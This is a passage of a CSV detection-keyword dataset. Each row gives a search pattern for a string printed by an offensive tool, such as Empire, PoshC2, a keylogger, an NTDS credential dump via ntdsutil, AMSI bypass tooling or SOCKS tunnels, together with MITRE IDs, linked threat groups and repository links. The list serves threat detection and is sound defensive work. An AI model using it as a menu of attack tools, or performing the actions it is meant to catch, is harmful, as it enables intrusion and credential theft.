at*",".{0,1000}Starting\sAutoPwnKey\sPort\sScanner\sat.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","#content","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","60319" "*Starting Browser Autopwn with Adobe Flash-only BrowserExploitServer-based exploits*",".{0,1000}Starting\sBrowser\sAutopwn\swith\sAdobe\sFlash\-only\sBrowserExploitServer\-based\sexploits.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","#content","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","60320" "*Starting bruteforce attack on *",".{0,1000}Starting\sbruteforce\sattack\son\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","#content","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","60321" "*Starting CcmExec service. 
Wait around 30 seconds for SCNotification.exe to run config file*",".{0,1000}Starting\sCcmExec\sservice\.\sWait\saround\s30\sseconds\sfor\sSCNotification\.exe\sto\srun\sconfig\sfile.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","#content","N/A","10","3","201","25","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z","60322" "*Starting DLL sideloading vulnerability scan*",".{0,1000}Starting\sDLL\ssideloading\svulnerability\sscan.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","0","N/A","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","60323" "*Starting enumerating file shares using domain credential for *",".{0,1000}Starting\senumerating\sfile\sshares\susing\sdomain\scredential\sfor\s.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","#content","N/A","9","2","165","20","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z","60324" "*Starting HVNC Server*",".{0,1000}Starting\sHVNC\sServer.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","#content","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","60325" "*Starting keylogger for 
*",".{0,1000}Starting\skeylogger\sfor\s.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#content","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","60326" "*starting Multi-Layered ACLight scan*",".{0,1000}starting\sMulti\-Layered\sACLight\sscan.{0,1000}","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","Discovery","https://github.com/cyberark/ACLight","1","0","#content","AD Enumeration","7","9","801","146","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z","60327" "*Starting NBNS spoofer*",".{0,1000}Starting\sNBNS\sspoofer.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068 - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","#content","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","60328" "*STARTING OBFUSCATED DECODER TESTS *",".{0,1000}STARTING\sOBFUSCATED\sDECODER\sTESTS\s.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#content","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","60329" "*Starting php server at localhost:*",".{0,1000}Starting\sphp\sserver\sat\slocalhost\:.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. 
If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","#content","N/A","10","","N/A","","","","60330" "*Starting PoolParty attack against process id: *",".{0,1000}Starting\sPoolParty\sattack\sagainst\sprocess\sid\:\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","#content","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","60331" "*Starting PoolParty attack against process id:*",".{0,1000}Starting\sPoolParty\sattack\sagainst\sprocess\sid\:.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","#content","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","60332" "*Starting port scan for *",".{0,1000}Starting\sport\sscan\sfor\s.{0,1000}","offensive_tool_keyword","Kubestroyer","Kubestroyer aims to exploit Kubernetes clusters 
misconfigurations and be the swiss army knife of your Kubernetes pentests","T1588.002 - T1596 - T1552.004","TA0005 - TA0007","N/A","N/A","Exploitation tool","https://github.com/Rolix44/Kubestroyer","1","0","#content","N/A","10","4","359","22","2024-07-26T06:33:00Z","2022-09-15T13:31:21Z","60333" "*starting RevSocksServer: *",".{0,1000}starting\sRevSocksServer\:\s.{0,1000}","offensive_tool_keyword","revsocks","Cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.","T1572 - T1090 - T1071","TA0001 - TA0010 - TA0011","N/A","Dispossessor","C2","https://github.com/emilarner/revsocks","1","0","#content","https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms","10","10","31","4","2022-08-08T07:59:16Z","2022-03-29T22:12:18Z","60334" "*Starting socks proxy on : *",".{0,1000}Starting\ssocks\sproxy\son\s\:\s.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#content","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","60335" "*Starting socks server * tunnel at *",".{0,1000}Starting\ssocks\sserver\s.{0,1000}\stunnel\sat\s.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. 
Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","FIN13 - IRIDIUM - UNC3524 - Worok - COZY BEAR - FANCY BEAR - EMBER BEAR - Sandworm","Data Exfiltration","https://github.com/sensepost/reGeorg","1","0","#content","N/A","N/A","10","3075","826","2025-03-06T09:56:16Z","2014-08-08T00:58:12Z","60336" "*starting the post exploitation with post exploitation modules*",".{0,1000}starting\sthe\spost\sexploitation\swith\spost\sexploitation\smodules.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","#content","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","60338" "*Starting tor (via systemctl)*",".{0,1000}Starting\stor\s\(via\ssystemctl\).{0,1000}","offensive_tool_keyword","tor2web","Tor2web is an HTTP proxy software that enables access to Tor Hidden Services by mean of common web browsers","T1090 - T1071","TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/tor2web/Tor2web","1","0","#content","N/A","9","8","718","177","2024-05-24T11:51:09Z","2011-12-17T15:14:02Z","60339" "*Starting Windows-Downdate*",".{0,1000}Starting\sWindows\-Downdate.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","#content","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","60340" "*Starting wstunnel server v*",".{0,1000}Starting\swstunnel\sserver\sv.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","Scattered 
Spider*","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","#content","N/A","10","10","4759","404","2025-04-15T11:07:11Z","2016-05-14T23:58:43Z","60341" "*-start-keylogger*",".{0,1000}\-start\-keylogger.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","Sandworm","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","N/A","10","10","1332","425","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z","60342" "*start-keystrokes*",".{0,1000}start\-keystrokes.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60343" "*start-keystrokes-writefile*",".{0,1000}start\-keystrokes\-writefile.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - 
APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60344" "*Start-MonitorTCPConnections.ps1*",".{0,1000}Start\-MonitorTCPConnections\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1144","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","60345" "*start-process ntdsutil.exe *create full**",".{0,1000}start\-process\sntdsutil\.exe\s.{0,1000}create\sfull.{0,1000}.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","60346" "*Start-ProcessAsUser*",".{0,1000}Start\-ProcessAsUser.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - 
T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","60347" "*Start-ProcessAsUser.ps1*",".{0,1000}Start\-ProcessAsUser\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","60348" "*StartProcessFake(*",".{0,1000}StartProcessFake\(.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider 
- XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","60349" "*Start-PSAmsiClient.ps1*",".{0,1000}Start\-PSAmsiClient\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","60350" "*Start-PSAmsiServer -*",".{0,1000}Start\-PSAmsiServer\s\-.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","60351" "*Start-PSAmsiServer.ps1*",".{0,1000}Start\-PSAmsiServer\.ps1.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","1","N/A","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","60352" "*Start-ReverseSocksProxy *",".{0,1000}Start\-ReverseSocksProxy\s.{0,1000}","offensive_tool_keyword","PowerProxy","PowerShell SOCKS proxy with reverse proxy capabilities","T1090.003 - T1059.001 - T1105","TA0011 - TA0005 - TA0008","N/A","Dispossessor","C2","https://github.com/get-get-get-get/PowerProxy","1","0","N/A","N/A","10","10","80","10","2021-04-23T16:51:28Z","2020-01-03T18:18:58Z","60353" "*Starts a PSCMD channel on the remote end*",".{0,1000}Starts\sa\sPSCMD\schannel\son\sthe\sremote\send.{0,1000}","offensive_tool_keyword","evilrdp","The evil twin of aardwolfgui using the aardwolf RDP 
client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","0","#content","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","60356" "*Starts the godoh C2 server*",".{0,1000}Starts\sthe\sgodoh\sC2\sserver.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","60357" "*Starts the godoh C2 server*",".{0,1000}Starts\sthe\sgodoh\sC2\sserver.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. 
Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","60358" "*Start-SimpleHTTPServer.ps1*",".{0,1000}Start\-SimpleHTTPServer\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","60360" "*Start-TCPMonitor*",".{0,1000}Start\-TCPMonitor.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","Start-MonitorTCPConnections.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","60361" "*startupfolderperistence.py*",".{0,1000}startupfolderperistence\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","60362" "*Start-WebcamRecorder.ps1*",".{0,1000}Start\-WebcamRecorder\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - 